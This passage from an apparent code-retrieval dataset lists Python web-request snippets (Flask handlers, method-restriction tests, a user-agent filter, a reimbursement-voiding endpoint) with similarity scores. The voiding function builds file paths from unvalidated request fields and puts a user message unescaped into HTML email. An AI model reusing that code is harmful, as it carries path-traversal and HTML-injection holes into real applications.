request.path.startswith('/api/'):\n message, detail = str(ex).split(\": \")\n return jsonify(message=message, detail=detail), ex.code\n else:\n return ex", "def forbidden():\n return HttpError(403)", "def prepare_api(self):\n return None", "def filter_request():\n if request.method not in ALLOWED_METHODS:\n return \"Method Not Allowed\", 405\n ua = str(request.user_agent)\n if \"Mozilla\" not in ua or \"Gecko\" not in ua:\n return \"No Scrappers!\", 403", "def lro_handling(self) -> global___Snippet.LroResponseHandling:", "def _dispatch(self, api):\n self._authorize(api)\n self._handle(api)", "def void_request(self):\n try:\n accountant_emails = [[\"{0} {1}\".format(accountant[0], accountant[1]), accountant[2]] for accountant in Users.query.with_entities(Users.first_name, Users.last_name, Users.email).join(Users.user_roles).filter((UserRoles.role == \"STFADM\") & (Users.net_id == \"sherrift\")).all()]\n folder_path = \"{0}/user_uploads/{1}/{2}/\".format(self.__APP_PATH__, request.json[\"net_id\"], request.json[\"request_id\"])\n request_submitted_marker = \"{0}request.submitted\".format(folder_path)\n request_processed_marker = \"{0}request.processed\".format(folder_path)\n request_returned_marker = \"{0}request.returned\".format(folder_path)\n request_voided_marker = \"{0}request.voided\".format(folder_path)\n\n void_message = request.json[\"return_message\"].strip()\n\n if path.exists(request_voided_marker):\n return jsonify({\"success\": False, \"type\": \"error\", \"message\": \"This request has already been voided. Please refresh the page.\"})\n\n if path.exists(request_processed_marker):\n if not get_user_roles(current_user.net_id)[\"STFADM\"]:\n return jsonify({\"success\": False, \"type\": \"error\", \"message\": \"Processed requests cannot be voided by the requester.\"})\n else:\n remove(request_processed_marker)\n\n if path.exists(request_submitted_marker):\n if not get_user_roles(current_user.net_id)[\"STFADM\"]:\n return jsonify({\"success\": False, \"type\": \"error\", \"message\": \"Submitted requests cannot be voided by the requester.\"})\n else:\n remove(request_submitted_marker)\n\n if path.exists(request_returned_marker):\n remove(request_returned_marker)\n\n with open(\"{0}submission.json\".format(folder_path), mode=\"r\") as request_details_json:\n request_details = json.load(request_details_json)\n\n with open(\"{0}submission.json\".format(folder_path), mode=\"w\") as request_details_json:\n date_time = \"{0}\".format(datetime.now()).split()\n\n request_details[\"history\"].append({\"date\": date_time[0],\n \"time\": date_time[1],\n \"action\": \"Voided\",\n \"actor\": {\n \"first_name\": current_user.first_name,\n \"last_name\": current_user.last_name,\n \"email\": current_user.email,\n \"uta_id\": current_user.uta_id\n },\n \"metadata\": {\n \"message\": void_message\n }})\n json.dump(request_details, request_details_json)\n\n with open(request_voided_marker, mode=\"w\") as voided_marker:\n voided_marker.write(\"/n\")\n\n if void_message:\n void_message_html = \"<br><br>Message from {0}:<br>\" \\\n \"<blockquote style='border-left: 3px solid rgb(200, 200, 200); \" \\\n \"border-top-color: rgb(200, 200, 200); border-right-color: \" \\\n \"rgb(200, 200, 200); border-bottom-color: rgb(200, 200, 200); padding-left: 1ex; \" \\\n \"margin-left: 0.8ex; color: rgb(102, 102, 102);'>\" \\\n \"<div style='color: rgb(0, 0, 0);'>{1}</div>\" \\\n \"</blockquote>\".format(current_user.first_name, void_message)\n void_message = \"\\n\\nMessage from 
{0}:\\n{1}\".format(current_user.first_name, void_message)\n else:\n void_message_html = \"\"\n\n request_date = \"{0:02d}/{1:02d}/{2:04d}\".format(request_details[\"request_date\"][\"month\"],\n request_details[\"request_date\"][\"day\"],\n request_details[\"request_date\"][\"year\"])\n\n email_subject = \"Reimbursement Request Voided\"\n email_body = app_constants.EMAILS[\"void_request\"][\"text\"].format(\n request_date,\n request_details[\"requester\"][\"first_name\"],\n request_details[\"requester\"][\"last_name\"],\n void_message, request_details[\"short_description\"],\n request_details[\"pay_to\"][\"name\"], request_details[\"pay_to\"][\"email\"],\n request_details[\"total_amount\"], \"{0}mavapps/\".format(URL_FULL_PATH))\n email_body_html = app_constants.EMAILS[\"void_request\"][\"html\"].format(\n request_date,\n request_details[\"requester\"][\"first_name\"],\n request_details[\"requester\"][\"last_name\"],\n void_message_html, request_details[\"short_description\"],\n request_details[\"pay_to\"][\"name\"], request_details[\"pay_to\"][\"email\"],\n request_details[\"total_amount\"], \"{0}mavapps/\".format(URL_FULL_PATH))\n\n if SRV != \"prod\":\n emails = self.__TEST_EMAILS__\n else:\n emails = [[\"{0} {1}\".format(request_details[\"requester\"][\"first_name\"], request_details[\"requester\"][\"last_name\"]), request_details[\"requester\"][\"email\"]]] \\\n + accountant_emails + self.__PROD_EMAILS__\n\n self.mailer.send_mail(emails, email_subject, email_body, email_body_html, from_name=\"CSE Reimbursement App\")\n\n return jsonify({\"success\": True, \"type\": \"success\", \"message\": \"Request voided successfully.\"})\n except Exception as e:\n print(e)\n return abort(400)", "def __call__(self, request):", "def protect_endpoint():\n pass", "def test_lti_rest_non_get(self):\r\n DISALLOWED_METHODS = (\"POST\", \"PUT\", \"DELETE\", \"HEAD\", \"OPTIONS\") # pylint: disable=invalid-name\r\n for method in DISALLOWED_METHODS:\r\n request = mock.Mock()\r\n request.method = method\r\n response = get_course_lti_endpoints(request, self.course.id.to_deprecated_string())\r\n self.assertEqual(405, response.status_code)", "def register_controllers(app: FastAPI) -> None:\n app.include_router(base.router)\n app.include_router(checks.router, prefix=\"/checks\", tags=[\"checks\"])", "def index():\n endpoints = []\n for api_endpoint in app.url_map.iter_rules():\n if api_endpoint.rule.startswith('/api'):\n url = api_endpoint.rule\n methods = api_endpoint.methods\n endpoints.append((url, str(methods)))\n return jsonify(endpoints)", "def __call__(self, req):\n return self._router", "def test_GET(self):\n if not self.url:\n return\n response = self.client.get(self.url, {}, format='json')\n self.assertIn(response.status_code, [status.HTTP_405_METHOD_NOT_ALLOWED,\n status.HTTP_401_UNAUTHORIZED])", "def unknown_method(self, response):\n raise NoData", "def api_root(request, format=None):\n return Response({\n 'judges' : reverse('user-list',request=request),\n 'pilots': reverse('pilot-list', request=request),\n 'marks': reverse('mark-list', request=request),\n 'results' : reverse('results-detail', request=request),\n })", "def test_unauthenticated_resource_allowed(self):\n raise NotImplementedError # FIXME", "def get(self, request, *args, **kwargs):\n verify_secure(request)\n return super().get(request, args, kwargs)", "def get(self, request, *args, **kwargs):\n verify_secure(request)\n return super().get(request, args, kwargs)", "def get(self, request, *args, **kwargs):\n verify_secure(request)\n return 
super().get(request, args, kwargs)" ]
[ "0.55937976", "0.55937976", "0.55937976", "0.55937976", "0.55937976", "0.5476229", "0.5457845", "0.5313464", "0.5251401", "0.5202117", "0.5182233", "0.5172451", "0.51495206", "0.51472974", "0.51144993", "0.5110918", "0.5094427", "0.50860524", "0.50750285", "0.5068474", "0.5059303", "0.5054207", "0.5053128", "0.5042909", "0.504271", "0.5042243", "0.5023599", "0.50196683", "0.5013515", "0.50109804", "0.49971032", "0.49892017", "0.4969839", "0.4969839", "0.49648565", "0.49485943", "0.49455228", "0.49446857", "0.49434412", "0.49376577", "0.49302652", "0.49143335", "0.48972073", "0.48935014", "0.48930275", "0.48880643", "0.4887957", "0.48854864", "0.48713237", "0.48680308", "0.48622507", "0.48606095", "0.48503816", "0.48472077", "0.48421395", "0.483846", "0.48348936", "0.48302412", "0.48260525", "0.48108485", "0.48086622", "0.48048627", "0.48048547", "0.48009956", "0.47948772", "0.47898114", "0.47800022", "0.47776252", "0.47694263", "0.4760907", "0.47527623", "0.47456428", "0.47424775", "0.47416496", "0.47374028", "0.4737229", "0.4734747", "0.47338772", "0.47314012", "0.47306627", "0.47257647", "0.47236693", "0.47182372", "0.47171426", "0.47167963", "0.4716439", "0.4713751", "0.47132885", "0.47051653", "0.47034383", "0.4702514", "0.47001204", "0.4700047", "0.4698964", "0.4693367", "0.46820664", "0.4679647", "0.46749556", "0.46696687", "0.46696687", "0.46696687" ]
0.0
-1
This creates the generator object yielding squares of the number
def generate_square_number(square_limit):
    for i in range(0,square_limit):
        yield i**2
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def square_numbers_2(nums):\n for i in nums:\n yield(i*i)", "def perfect_sq_seq_gen(num):\n for i in range(num):\n yield i ** 2", "def gensquares(n):\n for number in my_range.my_range(n): # note that we are NOT calling range(N), we implemented our own my_range() generator\n yield number**2", "def my_squares(iters):\n out = [i ** 2 for i in range(iters)]\n return out", "def my_squares(iters):\n out = []\n for i in range(iters):\n out.append(i ** 2)\n return out", "def test_nested_gen(n):\n for a in range(n):\n yield (b for b in range(a))", "def square_nums(number_list):", "def get_squares(n):\n\n return sum([i * i for i in range(n)])", "def _mc_gen():\r\n n = 1\r\n while True:\r\n yield n\r\n n += 1", "def numbers():\n for number in range(1, 76):\n yield number", "def gen_num(lim=10000):\n n = 1\n yield 2\n yield 3\n while 6 * n + 1 <= lim:\n yield 6 * n - 1\n yield 6 * n + 1\n n += 1", "def square(original_number):\n running_total = 0\n for counter in range(original_number):\n running_total = running_total + original_number\n return running_total", "def sum_of_squares(n, k, zeros=False):\n yield from power_representation(n, 2, k, zeros)", "def multiple_gen(modulus):\n count = 1\n while True:\n yield modulus * count\n count += 1", "def gen_primes():\n\n n = 1\n while True:\n while not isPrime(n):\n n += 1\n\n yield n\n n += 1", "def square():\r\n for _ in range(4):\r\n t.fd(200)\r\n t.rt(90)", "def square(n):\n\n result = [num * num for num in range(n)]\n\n return result[1:]", "def task5(count):\n number_1, number_2 = 1, 1\n for _ in range(count):\n yield number_1\n number_1, number_2 = number_2, number_1 + number_2", "def square(num):\n return num * num", "def square_number(number: int) -> int:\n return number * number", "def squares():\n return [i for i in xrange(11, 89) if 1 <= (i % 10) <= 8]", "def task_10_generator_of_simple_numbers() -> Generator[int, None, None]:\n def is_num_simple(n):\n \"\"\"\n Return: True if n is a simple number or False if it is not\n \"\"\"\n for i in range(n, 1, -1):\n if n % i == 0 and i < n and n != 1:\n return False\n return True\n\n # generator part\n n = 2\n while n < 200:\n if is_num_simple(n):\n yield n\n n = n + 1", "def generator(factor: int, test: typing.Callable[[int], bool],\n start: int) -> typing.Iterator[int]:\n value = start\n while True:\n value = (value * factor) % 2147483647\n if test(value):\n yield value", "def square(numbers):\n\n # Needs only one argument\n newlist = []\n for num in numbers:\n newlist.append(num*num)\n return newlist", "def prime_generator():\n i = 0 # prime numbers counter\n num = 0 # current number\n while True:\n num += 1\n if is_prime(num):\n i += 1\n yield i, num", "def main(start, end):\n for i in range(start, end+1):\n yield i, square(i), cube(i)", "def square(numbers):\n\n # Needs only one argument\n\n return numbers[0] ** 2", "def g_iter(n):\n \"*** YOUR CODE HERE ***\"\n if n <= 3:\n return n\n else:\n i = 3\n x, y, z = 1, 2, 3\n new = 1\n while i < n:\n new = z + (2*y) + (3*x)\n x, y, z = y, z, new \n i += 1\n return new", "def square(num):\n square = num ** 2\n return square", "def generate():\n j = [2]\n i = 3\n while i:\n if is_prime(i):\n j.append(i)\n yield [j, j[-1]]\n i += 2", "def xrndSphere(n):\n for i in xrange(n):\n yield rndSphere()", "def test_sum_of_yields(n):\n x = 0\n x += yield (0, x)\n x += yield (0, x)\n yield (1, x)", "def my_square(x):\n return x ** 2", "def make_square(x, size):\n return [ [x, -size/2, size/2],\n\t\t\t [x, size/2, size/2],\n [x, size/2, -size/2],\n\t\t\t [x, -size/2, 
-size/2]]", "def squared(num_list):\n new_list=[]\n for num in num_list:\n sq_num=pow(num,2)\n new_list.append(sq_num)\n return new_list", "def square(x):\n\n\treturn x * x", "def square(value):\n return value ** 2", "def generation(x, g):\n return int(x/g)", "def factor_gen(number):\n if number <= 0:\n raise ValueError(\"Not a valid number {}\".format(number))\n # O(sqrt(n)) sorted solution\n # For the unsorted solution, remove the queue and yield when found\n queue = []\n for f in count(1):\n if number != 1 and (f == 1 or f * f == number):\n yield f\n elif number <= f * f:\n yield from iter(queue)\n raise StopIteration\n elif number % f == 0:\n yield f\n queue.insert(0, number // f)", "def prime_generator() -> Iterator[int]:\n\n num = 2\n while True:\n if is_prime(num):\n yield num\n num += 1", "def exercise_gen(ret_val, times):", "def Pi(nmax, costheta):\r\n n = 2\r\n pi_n = 1\r\n pi_n_1 = 0\r\n yield pi_n\r\n while n <= nmax+1:\r\n newpi = (((2*n - 1) / (n - 1)) * costheta * pi_n - \r\n (n / (n - 1)) * pi_n_1)\r\n pi_n_1 = pi_n\r\n pi_n = newpi\r\n n = n + 1\r\n yield newpi", "def test_generator_method(self):\n for i in range(0, 4):\n yield self.try_odd, i", "def est_generator(limit=1000):\n last_guess = ZERO\n for i in range(limit):\n yield 1 + last_guess\n denom = last_guess + 2\n last_guess = 1 / denom", "def get_squares(x, y, width, height):\n return product(range(x+1, x+width+1), range(y+1, y+height+1))", "def gen_primes():\n\tyield 2\n\tyield 3\n\tprime_list = [2, 3]\n\twhile 1:\n\t\tnext = prime_list[-1] + 2\n\t\ti = 0\n\t\twhile i < len(prime_list):\n\t\t\tif next%prime_list[i] == 0:\n\t\t\t\tnext+=2\n\t\t\t\ti=0\n\t\t\telse:\n\t\t\t\ti+=1\n\t\tprime_list.append(next)\n\t\tyield next", "def generator():\n mygenerator = (x for x in range(3))\n for element in mygenerator:\n print 'poprve = ', element\n\n for element in mygenerator:\n print 'podruhe = ', element", "def floating_point_generator():\n i = 0\n while True:\n yield str((i % 5) * 1.1)\n i += 1", "def repeat(fun, n):\n for i in range(n):\n yield fun()", "def __iter__(self):\n return self._product_generator()", "def square():\n square_list = set()\n for seed_value in range(1, 101):\n square_list.add(int(math.pow(seed_value, 2)))\n return set(square_list)", "def test_gen_expr_maths() -> None:\n # Sum of squares\n squares_generator: Generator[int, None, None] = (i * i for i in range(10))\n assert sum(squares_generator) == sum((1, 4, 9, 16, 25, 36, 49, 64, 81))\n\n # Dot product\n x_vector: Tuple[int, int, int] = (1, 3, 5)\n y_vector: Tuple[int, int, int] = (2, 4, 6)\n assert sum(x * y for x, y in zip(x_vector, y_vector)) == 44", "def calcSpacings(self, n):\n\n first = next = (n) / float(n + 1)\n for i in range(n):\n yield (next, 1 - next)\n next = first - (1 - next)", "def triangle_numbers():\n counter, tri_number = 1, 1\n while True:\n yield tri_number\n counter += 1\n tri_number += counter", "def sum_of_squares(n):\n result = i = 0\n while i < n:\n result += i\n i += 1\n return result", "def rounds(self):\n if self.round_number > 0:\n for i in range(self.round_number):\n yield Round(i + 1)", "def my_square2(x):\n\treturn(x * x)", "def primes():\n yield 2\n found_primes = [2]\n a = 3\n while True:\n for p in found_primes:\n if p**2 > a:\n found_primes.append(a)\n yield a\n a += 2\n break\n elif a % p == 0:\n a += 2\n break", "def digit_generator(N=1_000_000):\n i = 0\n number = 1\n while N > i:\n for _i in str(number):\n yield _i\n i += 1\n number += 1", "def square( x ):\n return x * x", "def __init__(self):\n 
self.square_size = 3 # large squares on a side\n self.size = self.square_size**2 # squares on a side\n numbers = self.numbers = tuple(range(1, self.size + 1))\n rows = self.rows = range(self.size)\n cols = self.cols = range(self.size)\n self.values = {(r,c): numbers for r in rows for c in cols}\n self.number_strings = '.' + ''.join(str(x) for x in self.numbers)", "def h():\r\n x,y = 1,1\r\n while True:\r\n yield x\r\n x = x + (y)*(-1)**y\r\n y = y + 1", "def square(x):\n return x * x", "def square(x):\n return x*x", "def prime_generator():\r\n for i in itertools.count(start=1):\r\n for j in ((6 * i) - 1, (6 * i) + 1):\r\n if is_prime(j): yield(j)", "def __mul__(self, o): \n return MoebGen(self._a * o.a + self._b * o.c, self._a * o.b + self._b * o.d, \n self._c * o.a + self._d * o.c, self._c * o.b + self._d * o.d)", "def square_numbers_1(nums):\n result = []\n for i in nums:\n result.append(i*i)\n return result", "def square(n):\n\n my_CRLF = '\\n'\n return_value = ''\n for _ in range(n):\n return_value += line(n) + my_CRLF\n return return_value", "def test_programs():\n yield 4, 4, 1\n yield 16, 12, 2", "def squareOfSum(num):\n return sum(range(1, num + 1)) ** 2", "def square(n: int) -> int:\n return int(n ** 2)", "def prime_gen():\n for i in memo_primes: yield i\n x = memo_primes[-1] + 1\n \n while True:\n if prime_with(x, memo_primes):\n yield x\n memo_primes.append(x)\n x += 1", "def sum_of_squares(n):\n sum = 0\n\n for i in range(0,n):\n sum += i*i\n\n return sum", "def new_generator(self):\n return self.generator_function(*self.args, **self.kwargs)", "def generate_generator(self, seed=None):\n if seed is None:\n seed = self._seed\n scalar = find_integer(increment_seed(seed), self._bits)\n x = None\n for x in self._field:\n if (x ** 3 + self._a * x + self._b).is_square():\n break\n y = (x ** 3 + self._a * x + self._b).sqrt()\n y = ZZ(min(y, self._p - y))\n point = scalar * self.curve()(x, y)\n self._generator = point[0], point[1]", "def test_generator_inline(self):\n def test_odd(v):\n assert v % 2\n for i in range(0, 4):\n yield test_odd, i", "def pow2(limit):\n i = 0\n bin_num = 1\n while bin_num <= limit:\n yield bin_num\n i += 1\n bin_num = 2 ** i", "def generators(n):\n return [g for g in zn_star(n)\n if is_generator_in_zn(g, n)]", "def integers():\n i = 1\n while True:\n yield i\n i = i + 1", "def integers():\n i = 1\n while True:\n yield i\n i = i + 1", "def my_generator(n):\n print(\"Hello world! 
I'm a generator.\")\n i = 1\n try:\n while True:\n yield \"I generated %d\" % (i * n)\n i += 1\n except GeneratorExit:\n print(\"Generator closed at i=%d\" % i)", "def square(n):\r\n squared = n ** 2\r\n print (\"%d squared is %d.\" % (n, squared)) ## გიო: შეცდომას აგდებდა სანამ ფრჩხილებში არ ჩავსვი\r\n return squared", "def generator(self):\n return [None, 1]", "def primes():\n yield 2\n candidate = 3\n while True:\n for i in range(3, int(sqrt(candidate)) + 1, 2):\n if (candidate % i) == 0:\n break\n else:\n yield candidate\n candidate += 2", "def primes():\n yield 2\n candidate = 3\n while True:\n for i in range(3, int(sqrt(candidate)) + 1, 2):\n if (candidate % i) == 0:\n break\n else:\n yield candidate\n candidate += 2", "def square_and_multiply(x, exponent, n):\n result = 1\n while exponent > 0:\n if exponent % 2:\n result = (result * x) % n\n x = (x * x) % n\n exponent = exponent // 2\n return result", "def square(i, j):\n return map(sq_start, [i, j, i + 1, j + 1])", "def get_primes(lower: int, upper: int) -> typing.Generator[int, None, None]:\r\n for num in range(lower, upper + 1):\r\n if num > 1:\r\n for i in range(2, int(math.sqrt(num)) + 1):\r\n if num % i == 0:\r\n break\r\n else:\r\n yield num", "def in_square():\n return np.random.random_sample(size=2)", "def gen(self, n=0):\n if n != 0:\n raise IndexError(\"n must be 0\")\n return ComplexNumber(self, 0, 1)", "def squares(upper=10**5):\n nums = [True] * (upper + 1)\n nums[0] = False\n for i in range(2, (upper + 3) / 2):\n sq = i * i\n for j in range(sq, upper + 1, sq):\n nums[j] = False\n return nums", "def sum_of_squares(n):\n return (n * (n+1) * (2*n + 1)) / 6", "def square2(x):\n return x * x", "def _random_generate_bernstein_ ( fun , num ) :\n xmn = fun.xmin ()\n xmx = fun.xmax ()\n ymx = max ( fun.bernstein().pars() )\n i = 0 \n while i < num : \n x = _uniform_ ( xmn , xmx ) \n y = _uniform_ ( 0 , ymx )\n v = fun ( x )\n if v >= y :\n i+= 1 \n yield x", "def gen_sequence(a, b, c):\n i = 1\n while True:\n yield a * i**2 + b * i + c\n i += 1", "def possible_sums(numbers: Iterator[SnailfishNumber]) -> Iterator[SnailfishNumber]:\n yield from (a + b for a, b in permutations(numbers, 2))", "def square(x):\n return x**2", "def it(t, variant=0, min_q=3, max_q=sage.all.infinity, primes_only=False):\n for q in sage.all.primes(min_q, max_q) if primes_only else prime_powers(min_q, max_q):\n yield NormGraph(q, t, variant)", "def g_iter(n):\n \"*** YOUR CODE HERE ***\"\n if n < 4:\n return n\n else:\n g1 = 1\n g2 = 2\n g3 = 3\n i = 3\n while(i < n):\n i += 1\n t = g3 + 2*g2 + 3*g1\n g1 = g2\n g2 = g3\n g3 = t\n return g3", "def nextpow2(i):\n n = 1\n while n < i:\n n *= 2\n return n" ]
[ "0.76812726", "0.7570587", "0.7127406", "0.7013921", "0.6935942", "0.6566116", "0.65498954", "0.65378404", "0.65034443", "0.6499686", "0.64733166", "0.6452493", "0.6364364", "0.6352053", "0.6324538", "0.63203084", "0.62623084", "0.6218521", "0.6207027", "0.6205454", "0.619938", "0.6184534", "0.607988", "0.6055128", "0.60494274", "0.60432804", "0.60318965", "0.59891254", "0.59867", "0.5971077", "0.5945609", "0.5936474", "0.5914042", "0.59051156", "0.5901671", "0.588901", "0.5886832", "0.58738565", "0.58736765", "0.5872506", "0.5868297", "0.5866551", "0.5864959", "0.5856865", "0.5850458", "0.5849793", "0.5834694", "0.5825616", "0.5823485", "0.5814875", "0.5800164", "0.57945156", "0.57918084", "0.57878923", "0.5781809", "0.5778792", "0.5778564", "0.5774946", "0.57619286", "0.57581013", "0.5757171", "0.57562006", "0.57478774", "0.5736855", "0.5728195", "0.5728079", "0.57194453", "0.5717822", "0.57149404", "0.570092", "0.56953967", "0.5692247", "0.5687921", "0.5664108", "0.56531894", "0.5646731", "0.56453013", "0.5645104", "0.5640075", "0.5640075", "0.5635316", "0.5630844", "0.56305206", "0.5630275", "0.5630275", "0.56292", "0.56236255", "0.5613654", "0.5606165", "0.559097", "0.55908376", "0.55890465", "0.5588625", "0.5582088", "0.55815345", "0.5574861", "0.5572216", "0.5561515", "0.5560066", "0.55557823" ]
0.7852594
0
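A minimal usage sketch for the generator document in the row above, assuming the flattened snippet reconstructs as a standard Python generator function; the limit value 5 and the variable name squares are illustrative only.

def generate_square_number(square_limit):
    # Lazily yields i**2 for i in 0..square_limit-1; nothing is computed until iteration.
    for i in range(0, square_limit):
        yield i**2

squares = generate_square_number(5)   # returns a generator object; no squares computed yet
print(list(squares))                  # [0, 1, 4, 9, 16]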
r"""One could also use the Laplacian of Gaussian formula to design the filter.
def laplacian_1d(window_size) -> torch.Tensor:
    filter_1d = torch.ones(window_size)
    filter_1d[window_size // 2] = 1 - window_size
    laplacian_1d: torch.Tensor = filter_1d
    return laplacian_1d
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def filter(self, op=GaussianFilter):\n\n if self._verbose > 0:\n print(\"Filtering...\")\n\n # Import from utils specified params.\n params = get_filtering_params()\n\n negative = self.image_raw - op(sigma=params['sigma_bgd']).convolve(self.image_raw)\n\n self.image_filtered = op(sigma=params['sigma_spots']).convolve(negative)", "def Gauss_filter(data, sigma=(0,2,2), mode='wrap'): \n import scipy.ndimage.filters as flt\n return flt.gaussian_filter(data, sigma=sigma, mode=mode)", "def gaussian_filter(x):\n return _gaussian_filter(x, 3)", "def apply_filter(self, image):\n gauss_low = cv2.GaussianBlur(image, ksize=(0,0), sigmaX=self._sigma_low , sigmaY=self._sigma_low)\n gauss_high = cv2.GaussianBlur(image, ksize=(0,0), sigmaX=self._sigma_high, sigmaY=self._sigma_high)\n\n filtered_image = gauss_low - gauss_high\n\n return normalize(filtered_image, nb_bits=8)", "def get_gaussian_low_pass_filter(shape, cutoff, order):\n \n print(\"gaussian_low_pass_filter = \")\n print(\"cutoff: \",cutoff)\n print(\"order: \",order)\n filter = np.zeros(shape)\n\n for i in range(shape[0]):\n for j in range(shape[1]):\n D = np.sqrt((i - (shape[0] / 2)) ** 2 + (j - (shape[1] / 2)) ** 2)\n\n filter[i, j] = math.exp(-D ** 2 / (2 * (cutoff ** 2)))\n\n # return filter\n return process_filter(image, filter)", "def build_filter(n, sigma):\n filter_ = np.zeros((n,n))\n\n begin = n//2\n\n for i in range(n):\n for j in range(n):\n val = ((i-begin)**2 + (j-begin)**2)**0.5\n filter_[i][j] = gaussian(val, sigma)\n\n return filter_", "def get_gaussian_low_pass_filter(self, shape, cutoff):\r\n P = shape[0]\r\n Q = shape[1]\r\n mask = np.zeros((P, Q))\r\n for u in range(P):\r\n for v in range(Q):\r\n dist = (((u - (P / 2)) ** 2) + ((v - (Q / 2)) ** 2)) ** (1 / 2)\r\n\r\n mask[u][v] = math.exp((-dist ** 2) / (2 * (cutoff ** 2)))\r\n\r\n return mask", "def custom_filter(image: Image) -> Image:\n image = image.filter(ImageFilter.Kernel(\n size=(3, 3), kernel=(1, 0, 1, 0, 0, 0, 1, 0, 1)))\n return image", "def get_gaussian_low_pass_filter(self, shape, cutoff):\n from numpy import exp\n \n mask = zeros(shape)\n row_size, col_size = shape[0], shape[1]\n center_row, center_col = row_size/2 , col_size/2\n for r in range(0, row_size):\n for c in range(0, col_size):\n freq_dist = sqrt( (r-center_row)**2 + (c-center_col)**2 )\n mask[r,c] = (exp(-(freq_dist**2)/(cutoff*2)**2)) if freq_dist > cutoff else 1.0\n\n return mask", "def log_filter(img, noData):\n img1 = np.float64(img.copy())\n img1 = sf.laplace( img1, mode='constant')\n if np.sum(img<=noData) > 0 : #zero the filtered image at data-nodata boundaries\n mask = np.float64(img.copy())\n mask[:] = 1.\n mask[img<=noData] = 0.0\n mask=sf.laplace(mask, mode='constant')\n img1[mask != 0.] = 0. 
# set the borders to zero\n img1 = sf.gaussian_filter(img1, (1.4, 1.4), mode='constant')\n return img1", "def filter(data_raw: dict, sigma: int=1) -> dict:\n data = Filter.__band_filter(data_raw, lowFreq=2, highFreq=70, filterType='bandstop')\n data = Filter.__laplacian_filter(data,sigma) #Need to write test for this once its complete\n return data", "def gaussian_filter(size,sigma=-1):\n\n if sigma == -1:\n sigma = np.sqrt(size)\n\n filter = np.zeros((size,size))\n\n for i,j in it.product(range(size),range(size)):\n x = j-size//2\n y = i-size//2\n filter[i,j] = 1/(2*np.pi*sigma**2) * np.exp(-(x**2+y**2)/(2*sigma**2))\n\n filter = filter/filter[0,0]\n filter = filter/filter.sum()\n\n return filter", "def filterf(self):\n from scipy.ndimage.filters import gaussian_filter as gf\n self._obj['u'] = xr.DataArray(gf(self._obj['u'],1),dims=('x','y'))\n self._obj['v'] = xr.DataArray(gf(self._obj['v'],1),dims=('x','y'))\n return self._obj", "def smooth_scipy(self, mri_data):\n\n # image dimension\n if hasattr(mri_data.img_header, 'info'):\n dx, dy, dz = np.abs(mri_data.img_header.info['DELTA'])\n elif hasattr(mri_data.img_header, 'get_zooms'):\n dx, dy, dz = mri_data.img_header.get_zooms()[:3]\n else:\n self.errmsg(\"No voxel size information in mri_data header\")\n\n # Set gaussian sigma in image dimension\n sigma = (self.blur_fwhm / np.array((dx, dy, dz))) / 2.354820\n imgdata = mri_data.img_data.astype(np.float64)\n\n # Apply mask\n if hasattr(self, 'maskV'):\n imgdata[~self.maskV] = 0\n\n # Apply Gaussian filter\n filt_img = gaussian_filter(imgdata, sigma, mode='constant')\n\n if hasattr(self, 'maskV'):\n # Adjust voxels with out of the mask (0) convolution\n aux_img = np.ones_like(imgdata)\n aux_img[~self.maskV] = 0\n filt_aux_img = gaussian_filter(aux_img, sigma, mode='constant')\n filt_img[self.maskV] /= filt_aux_img[self.maskV]\n\n return filt_img.astype(mri_data.img_data.dtype)", "def fake_gaussian(img, vertical_horizontal_sigma, iter=3):\n sigma_vertical, sigma_horizontal = vertical_horizontal_sigma\n h_blured = box_filter1d(img, sigma_horizontal, horizontal=True, iter=iter)\n blured = box_filter1d(h_blured, sigma_vertical, horizontal=False, iter=iter)\n return blured", "def apply_filter(image: np.ndarray) -> np.ndarray:\n # choose filters to apply\n return clahe(image)", "def gaussian_filter(img,f=5,K=1,var=1):\n i_x, i_y = np.shape(img) # image size\n radi = f//2 # window radius\n\n # create gaussian kernel\n def gaussian_kernel(f,K,var):\n \n # create coordinate information \n if f//2 == 0:\n x = np.linspace(-radi,radi,f+1)\n y = np.linspace(-radi,radi,f+1)\n x = np.delete(x, radi)\n y = np.delete(y, radi)\n else:\n x = np.linspace(-radi,radi,f)\n y = np.linspace(-radi,radi,f)\n\n m_x, m_y = np.meshgrid(x,y) # create coordinate\n r_gauss = m_x**2 + m_y**2 # distance to origin\n gauss = K*(np.exp(-r_gauss/(2*(var**2)))) # create kernel\n return gauss/gauss.sum()\n \n #mirror padding\n def mir_padding(img,f):\n img_p = np.zeros((i_x+2*radi,i_y+2*radi)) #create padding image\n img_p[radi:i_x+radi,radi:i_y+radi] = img #throw original image to padding image\n img_p[0:radi,radi:i_y+radi] = img[radi-1::-1,:] # padding top rows\n img_p[-radi::1,radi:i_y+radi] = img[-1:-radi-1:-1,:] # padding bottom rows\n img_p[radi:i_x+radi,0:radi] = img[:,radi-1::-1] # padding left column\n img_p[radi:i_x+radi,-radi::1] = img[:,-1:-radi-1:-1] # padding right column\n for i in range(f):\n img_p[0:radi,i] = img[radi-1-i,radi-1::-1] # padding upper-left corner\n img_p[0:radi,-i] = img[radi-1-i,-radi::1] # 
padding upper-righ corner\n img_p[-1:-radi-1:-1,i] = img[-radi+i,radi-1::-1] # padding lower-left corner\n img_p[-1:-radi-1:-1,-i] = img[-radi+i,-radi::1] # padding lower-right corner\n return img_p\n\n img_p = mir_padding(img,f) # create padding image\n g_kernel = gaussian_kernel(f,K,var) # create gaussian kernel\n\n #seperate kernel\n E = g_kernel[0,0]\n c = g_kernel[:,0]\n wT = np.reshape(g_kernel[0,:]/E,(f,1))\n\n gauss_image = np.zeros([i_x,i_y]) # create gauss image\n temp_image = np.zeros([i_x,i_y]) # create temp image for two 1D convolution\n old_c_sum = c.sum() # calculate sum of c before modification\n\n # if elements of kernel are located within area of padding, substitute value with 0\n # calculate new value base on ratio between sum before and after modification\n for j in range(i_y):\n y_bound = i_y - j\n mod_c = c.copy()\n if j < radi:\n mod_c[0:radi-j] = 0 \n new_c_sum = mod_c.sum()\n mod_c = mod_c*old_c_sum/new_c_sum \n if j > i_y - radi - 1:\n mod_c[-1:-radi+y_bound-1:-1] = 0 \n new_c_sum = mod_c.sum()\n mod_c = mod_c*old_c_sum/new_c_sum \n for i in range(i_x):\n temp_image[i,j] = np.sum(img_p[i+radi,j:j+f]*mod_c)\n\n temp_image = mir_padding(temp_image,f) # create padding temp image for next 1D convolution\n old_wT_sum = wT.sum() # calculate sum of wT before modification\n\n # if elements of kernel are located within area of padding, substitute value with 0\n # calculate new value base on ratio between sum before and after 